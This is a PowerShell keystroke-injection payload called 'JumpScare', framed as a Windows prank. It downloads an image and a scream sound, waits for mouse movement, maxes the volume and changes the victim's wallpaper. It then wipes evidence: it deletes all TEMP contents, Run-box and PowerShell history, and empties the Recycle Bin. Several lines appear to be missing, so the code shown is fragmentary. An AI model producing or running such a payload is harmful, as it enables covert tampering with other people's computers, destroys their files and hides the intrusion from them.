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2022-05-10 03:41:20 +00:00
# | ___ _ _ _ # ,d88b.d88b #
# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# # \ / \~ ~/ #
# # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# # | | | | ) ) | | | (( | | | | | |#
# # | | | |( ( | | | \\ | | | | | |#
This script can be run as is with the provided execution file
This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level
Upon running this script it will immediately pause after the downloads until a mouse movement is detected
The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready
After a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play
# Download Image; replace link to $image to add your own image
$image = ""
$i = -join($image,"?dl=1")
iwr $i -O $env:TMP\i.png
iwr -O $env:TMP\i.png
# Download WAV file; replace link to $wav to add your own sound
$wav = ""
$w = -join($wav,"?dl=1")
iwr $w -O $env:TMP\s.wav
This will take the image you downloaded and set it as the targets wall paper
Function Set-WallPaper {
Applies a specified wallpaper to the current user's desktop
Provide the exact path to the image
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
param (
# Provide path to image
# Provide wallpaper style that you would like applied
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
This is to pause the script until a mouse movement is detected
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
This is to play the WAV file
function Play-WAV{
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync()
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
Set-WallPaper -Image "$env:TMP\i.png" -Style Center
This is to clean up behind you and remove any evidence to prove you were there
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell